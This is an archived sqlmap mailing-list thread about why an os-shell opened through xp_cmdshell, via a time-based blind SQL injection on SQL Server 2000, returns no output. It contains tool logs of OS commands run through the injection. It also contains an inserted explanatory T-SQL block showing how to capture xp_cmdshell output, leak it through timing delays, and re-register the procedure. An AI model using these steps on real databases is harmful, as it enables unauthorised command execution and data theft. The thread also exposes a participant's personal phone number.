Thread: [sqlmap-users] OS Shell
From: Chris O. <chr...@gm...> - 2011-12-21 14:56:59

Hi all,

I have a time based blind injection on a machine running Windows Server 2003, IIS 6 and SQL Server 2000. The user is running as DBA. I should be able to enable xp_cmdshell, and indeed:

[13:10:12] [INFO] testing if current user is DBA
[13:10:12] [INFO] retrieved: 1
[13:10:29] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
[13:10:40] [INFO] xp_cmdshell extended procedure is available
[13:10:41] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[13:10:41] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> dir
do you want to retrieve the command standard output? [Y/n/a]
[13:10:53] [INFO] retrieved:
No output
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a]
[13:11:11] [INFO] retrieved:
No output
os-shell> exit
[13:31:24] [INFO] cleaning up the database management system
[13:31:26] [INFO] Fetched data logged to text files under...

As you can see, no output is returned (is this because of the injection type, I wonder?).

I've tried the various out of bounds methods with BT and msf too, but this seems to fail at various stages.

Could it be that the database server is separate from the web server and is totally isolated from the outside world by egress rules?

I'm trying to understand why in this case nothing seems to be working.

Any ideas would be great.

Regards

Chris
From: Miroslav S. <mir...@gm...> - 2011-12-21 15:24:43

Hi Chris.

Could you please send the traffic file retrieved with -t traffic.txt?

Kind regards,
Miroslav Stampar
From: Bernardo D. A. G. <ber...@gm...> - 2011-12-21 15:31:49

Hi Chris,

On 21 December 2011 14:56, Chris Oakley <chr...@gm...> wrote:
> Hi All
>
> I have a time based blind injection on a machine running Windows Server
> 2003, IIS 6 and SQL Server 2000. The user is running as DBA. I should be
> able to enable xp_cmdshell, and indeed:

Indeed.

> ...
> As you can see, no output is returned (is this because of the injection type
> I wonder?).

No, it has nothing to do with the injection type. The SQL payloads used by sqlmap have been written, and the core has been engineered, in a way that regardless of the technique used, sqlmap is able to retrieve the queries' output. The issue is somewhere else.

> I've tried the various out of bounds methods with BT and msf too, but this
> seems to fail at various stages.
>
> Could it be that the database server is separate from the web server and is
> totally isolated from the outside world by egress rules?

This could be, but it looks to me that you're mixing xp_cmdshell/bug with network rules. I think that the issue here is about xp_cmdshell.

Could you please relaunch with -v 3 --parse-errors -t traffic.log and send us (privately if you prefer) the whole output and the log file?

Thank you.
Bernardo

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
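The point above, that output retrieval is independent of the injection technique, rests on a simple mechanism: the command's output is written into a table on the database server and then read back through whatever blind channel the injection already provides. The following T-SQL is an added illustration of that mechanism; it is not sqlmap's code and not from this thread. The table name dbo.cmd_out, the command ipconfig, the row/character chosen in step 3 and the comparison value 77 are assumptions made for the example.

```sql
-- Added example (not sqlmap's own code): run xp_cmdshell as a sysadmin
-- on SQL Server and read its output back over a time-based blind channel.
-- dbo.cmd_out is an assumed, throwaway table name.

-- 1. Capture output into a permanent table. A #temp table would be
--    session-scoped and can disappear between pooled web-app connections,
--    so each injected request may not see it.
IF OBJECT_ID('dbo.cmd_out') IS NOT NULL DROP TABLE dbo.cmd_out;
CREATE TABLE dbo.cmd_out (id INT IDENTITY(1,1), line NVARCHAR(4000) NULL);
INSERT INTO dbo.cmd_out (line) EXEC master..xp_cmdshell 'ipconfig';

-- 2. Sanity check. xp_cmdshell emits at least one row (a trailing NULL
--    line) whenever it actually executes, so a count of zero means the
--    procedure never ran: the call errored (permissions, missing DLL,
--    procedure dropped), not "the command printed nothing".
SELECT COUNT(*) AS rows_captured FROM dbo.cmd_out;

-- 3. Time-based blind extraction of one character: a 5-second delay means
--    the first character of row 2 has an ASCII code above 77. This is the
--    single comparison sqlmap repeats (by bisection) for every character.
IF (SELECT ASCII(SUBSTRING(line, 1, 1)) FROM dbo.cmd_out WHERE id = 2) > 77
    WAITFOR DELAY '0:0:5';

-- 4. SQL Server 2000 has no sp_configure 'xp_cmdshell' switch (that is
--    2005 and later). If the extended procedure was removed, a sysadmin
--    re-registers it from the DLL that ships with the instance.
-- EXEC master..sp_addextendedproc 'xp_cmdshell', 'xplog70.dll';

-- 5. Clean up.
DROP TABLE dbo.cmd_out;
```

Step 2 is the check worth running by hand when a tool reports "No output": if the row count is zero the problem is xp_cmdshell itself (or the account it runs under), not the technique used to read the table, which is exactly the distinction drawn in the reply above.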
From: Chris O. <chr...@gm...> - 2011-12-29 17:05:45

Thanks for the replies. Yes, it'll have to be in private.

When I relaunch, do you need me to do it from scratch (as in flush session) or is it ok to just use the traffic logging options with the injection already found?
From: <and...@gm...> - 2011-12-29 17:22:44

Hi Chris,

Yes, you have to use the flush-session option.

Andre
From: Bernardo D. A. G. <ber...@gm...> - 2011-12-29 18:33:56

Yes please, with --fresh-queries -v3 -t traffic.log.

Bernardo Damele A. G.
This message was sent from a smartphone